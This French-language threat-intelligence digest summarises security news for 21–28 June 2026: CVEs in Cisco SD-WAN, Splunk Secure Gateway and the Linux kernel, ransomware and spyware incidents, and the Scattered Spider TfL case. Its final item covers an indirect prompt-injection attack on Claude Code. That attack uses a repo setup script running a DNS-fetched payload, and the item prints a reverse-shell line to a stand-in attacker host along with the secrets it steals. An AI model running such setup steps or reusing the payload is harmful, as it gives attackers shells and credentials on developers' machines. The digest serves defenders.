Bienvenue sur Cyberveille

Cette page présente les vulnérabilités les plus discutées sur les sources publiques (Fediverse, Bluesky, GitHub, blogs) sur la période analysée. Période analysée : 2026-06-21 → 2026-06-28. Les données sont collectées via Vulnerability-Lookup (CIRCL) et enrichies automatiquement afin d’aider à la priorisation de la veille et de la remédiation. 📌 Légende : CVSS : score officiel de sévérité technique. EPSS : probabilité d’exploitation observée. VLAI : estimation de sévérité basée sur une analyse IA du contenu de la vulnérabilité. CISA KEV : vulnérabilité activement exploitée selon la CISA. seen / exploited : signaux observés dans les sources publiques. CVE-2026-20245 CVSS: 7.8 EPSS: 9.92% VLAI: High (confidence: 0.9888) CISA: KEV ProduitCisco — Cisco Catalyst SD-WAN Controller Publié2026-06-04T22:33:00.748Z A vulnerability in the CLI of Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, and Cisco Catalyst SD-WAN Validator, formerly SD-WAN vBond, could allow an authenticated, local attacker to execute arbitrary commands as root by supplying a crafted file to the affected system. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by uploading a crafted file to the affected system. A successful exploit could allow the attacker to perform command injection attacks on an affected system and elevate their privileges as the root user. To exploit this vulnerability, the attacker must have netadmin privileges on the affected system. This would require valid credentials or exploitation of or . Cisco is not aware of successful exploitation by other methods. Cisco has observed limited cases where the exploitation of this bug resulted in a configuration change pushed to edge devices. Cisco recommends that customers upgrade to the fixed software that is documented in the that was published on May 14, 2026, and verify the configuration of the edge devices. ...

🏛️ Contexte Source : ASIO (Australian Security Intelligence Organisation), discours du directeur général Mike Burgess AM, publié le 24 juin 2026. Il s’agit de l’évaluation annuelle des menaces 2026, présentée publiquement et couvrant l’ensemble du spectre des menaces pesant sur l’Australie. 🌐 Environnement sécuritaire global L’ASIO décrit un environnement dynamique, diversifié et dégradé, caractérisé par des menaces concurrentes, en cascade et cumulatives. La compétition entre grandes puissances, l’espionnage à des niveaux extrêmes, la préparation au sabotage et la violence politiquement motivée constituent les axes principaux. ...

🏦 Contexte Source : dépôt SEC (EDGAR), publié le 26 juin 2026. River Financial Corporation, incluant sa filiale River Bank & Trust, a notifié la SEC d’un incident de cybersécurité survenu mi-juin 2026. 🔓 Déroulement de l’incident Vers le 16 juin 2026 : un acteur malveillant non identifié obtient un accès non autorisé à l’environnement réseau de River Financial Corporation. Vers le 19 juin 2026 : River identifie l’activité malveillante. Un ransomware est déployé sur des portions de l’environnement serveur. 🛡️ Mesures de confinement Désactivation des comptes administratifs compromis. Mise hors ligne des systèmes impactés. 🔍 Investigation en cours River, assistée d’un cabinet forensique tiers, mène une investigation pour déterminer la nature et l’étendue de l’incident, notamment si des données personnelles identifiables (PII) ont été accédées ou exfiltrées. L’enquête est toujours en cours au moment de la publication. ...

🔍 Contexte Publié le 25 juin 2026 par le Citizen Lab (Université de Toronto), ce rapport présente une analyse forensique détaillée de l’utilisation de l’outil Cellebrite UFED par les autorités russes contre l’activiste politique Andrey Pivovarov, ancien directeur de l’ONG Open Russia. 📱 Incident principal Le 31 mai 2021, Pivovarov est arrêté à l’aéroport de Saint-Pétersbourg. Ses appareils (iPhone 12 et MacBook) sont confisqués. L’analyse forensique révèle avec haute confiance que Cellebrite UFED a été utilisé le 17 juin 2021 pour extraire les données de son iPhone, via une connexion USB identifiée par un Host ID Cellebrite (9016926980658937761372207). ...

🔍 Contexte Publié le 29 juin 2026 sur GitHub par le chercheur Fady Oueslati (ReactiveZero Security Research), ce dépôt documente la vulnérabilité CVE-2026-20251 affectant Splunk Secure Gateway (SSG), avec un score CVSS 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). Un patch est disponible. 🐛 Vulnérabilité La faille repose sur une désérialisation non sécurisée via jsonpickle dans le composant SSG. Le flux d’exploitation est le suivant : Un attaquant authentifié (faibles privilèges) écrit un document malveillant dans la collection KV Store mobile_alerts via l’API REST Splunk. SSG lit ce document dans alerts_request_processor.py et le soumet au validateur check_alert_data_valid_json(). Le validateur court-circuite dès qu’il rencontre la clé py/object avec une valeur commençant par spacebridgeapp, retournant True sans inspecter les clés suivantes. Le document est ensuite passé à jsonpickle.decode(..., safe=True), qui exécute le gadget py/reduce présent dans la clé notification — le flag safe=True ne bloque pas ce chemin de code. 🎯 Impact Exécution de code arbitraire en tant que compte de service Splunk Nécessite uniquement un login Splunk valide à faibles privilèges Confidentialité, intégrité et disponibilité toutes compromises 📦 Versions affectées Branche Corrigé dans SSG 3.9.x 3.9.20 SSG 3.10.x 3.10.6 SSG 3.8.x 3.8.67 Splunk Enterprise 10.0.7 / 10.2.4 / 10.4.0+ Instance testée : SSG 3.9.19 sur Splunk Enterprise 10.0.6 (macOS x86_64). ...

🔍 Contexte Source : The Hacker News, publiée le 26 juin 2026. L’article rapporte la découverte et la divulgation publique d’une vulnérabilité critique dans le noyau Linux, identifiée sous le nom CVE-2026-46331 et surnommée « pedit COW ». 🐛 Vulnérabilité Type : Écriture hors limites (out-of-bounds write) Composant affecté : Sous-système de contrôle du trafic réseau du noyau Linux, spécifiquement le module d’action d’édition de paquets (act_pedit) Mécanisme : La faille corrompt la mémoire partagée du cache de pages (shared page-cache memory) Impact : Élévation de privilèges locale — un utilisateur non privilégié peut obtenir les droits root sur les systèmes affectés ⚡ Exploitation Un exploit public fonctionnel a été publié dans la journée suivant l’attribution du CVE, soit le 16 juin 2026 La rapidité de publication de l’exploit augmente significativement le risque d’exploitation active 🏢 Évaluation des éditeurs Red Hat a attribué une sévérité à cette vulnérabilité (le niveau exact n’est pas précisé dans l’extrait disponible) 📌 Type d’article Article de presse spécialisée signalant une vulnérabilité noyau Linux avec exploit public disponible, destiné à informer les équipes de sécurité et les administrateurs systèmes Linux. ...

🏛️ Contexte Le 22 juin 2026, la National Crime Agency (NCA) britannique a annoncé la condamnation de deux cybercriminels ayant attaqué le réseau informatique de Transport for London (TfL). L’article est publié sur le site officiel de la NCA. 👤 Acteurs identifiés Thalha Jubair, 20 ans, originaire de l’Est de Londres Owen Flowers, 18 ans, originaire de Walsall, West Midlands Tous deux membres du collectif criminel en ligne Scattered Spider 🗓️ Chronologie 31 août – 3 septembre 2024 : infiltration du réseau de TfL 6 septembre 2024 : première arrestation de Flowers pour l’attaque TfL 16 septembre 2024 : arrestation des deux individus à leur domicile par la NCA et la City of London Police (COLP) Mars et mai 2025 : Flowers viole ses conditions de liberté sous caution à deux reprises 22 juin 2026 : les deux accusés plaident coupable au Woolwich Crown Court 16 juillet : date prévue pour le prononcé de la peine 💥 Impact de l’attaque 29 millions de livres sterling de pertes et coûts de récupération pour TfL Les 28 000 employés de TfL ont dû se rendre physiquement dans un bureau pour réinitialiser leur mot de passe Accès aux données du système de remboursements Oyster Perturbation du système de remboursement clients Fermeture du système de demande de photocards Oyster pour enfants et jeunes 🏥 Victimes supplémentaires Lors de l’arrestation de Flowers, des preuves ont été trouvées indiquant l’infiltration et l’endommagement des réseaux de deux entreprises américaines de santé : ...

🔍 Contexte Publié le 25 juin 2026 par les chercheurs Eddy Tsalolikhin et Or Peles de JFrog Security Research, cet article présente une analyse technique approfondie de DirtyClone, une nouvelle variante de la famille de vulnérabilités DirtyFrag affectant le noyau Linux. La vulnérabilité est référencée CVE-2026-43503 (CVSS 8.8, sévérité haute). 🧬 Famille de vulnérabilités DirtyFrag DirtyFrag est une famille de vulnérabilités de corruption mémoire dans la pile réseau du noyau Linux, exploitant l’intersection entre : ...

🔍 Contexte Publié le 19 juin 2026 par SpyCloud Labs, cet article présente une analyse technique approfondie de l’infrastructure opérationnelle du groupe à l’origine du dataset « FortiBleed », initialement découvert par le chercheur Volodymyr « Bob » Diachenko. SpyCloud a obtenu une copie des données et les a analysées contre son schéma de brèches. 🎯 Nature de la campagne La campagne, active depuis le 19 mai 2026, est opérée par un courtier d’accès initial (IAB) russophone utilisant des techniques de mass-scanning et brute-force (spray-and-pray) contre des équipements exposés sur Internet : ...

🔍 Contexte Publié le 25 juin 2026 par Andre Hall & Miller Engelbrecht sur le blog de 0DIN (plateforme de bug bounty IA de Mozilla), cet article présente une démonstration technique d’une attaque par injection de prompt indirecte ciblant les outils de développement agentiques, en particulier Claude Code d’Anthropic. ⚙️ Mécanisme de l’attaque L’attaque repose sur trois composants enchaînés, chacun individuellement bénin : Un dépôt GitHub normal : un fichier README ou issue décrit une procédure d’initialisation standard (pip3 install -r requirements.txt puis python3 -m axiom init). Un package Python qui échoue intentionnellement : le module axiom lève une RuntimeError s’il n’est pas initialisé, incitant l’agent à exécuter python3 -m axiom init comme correction de routine. Un script d’initialisation qui résout un enregistrement DNS TXT : scripts/setup.sh exécute dig +short TXT _axiom-config.m100.cloud @1.1.1.1 et passe le résultat à bash -c. L’enregistrement DNS contient un reverse shell encodé en base64 (bash -i >& /dev/tcp/<attacker-host>/4443 0>&1). 💥 Impact Shell interactif s’exécutant avec les droits de l’utilisateur développeur Exfiltration de secrets d’environnement : ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN Possibilité de persistance (clé SSH, cron job, backdoor) Le payload est invisible : absent du dépôt, non détectable par les scanners statiques, jamais évalué par l’agent avant exécution Le payload peut être modifié à tout moment en éditant l’enregistrement DNS, sans aucun commit 🎯 Vecteur de diffusion Un simple lien vers le dépôt partagé dans une offre d’emploi, un tutoriel ou un message Slack suffit à compromettre tout développeur ouvrant le projet avec Claude Code. ...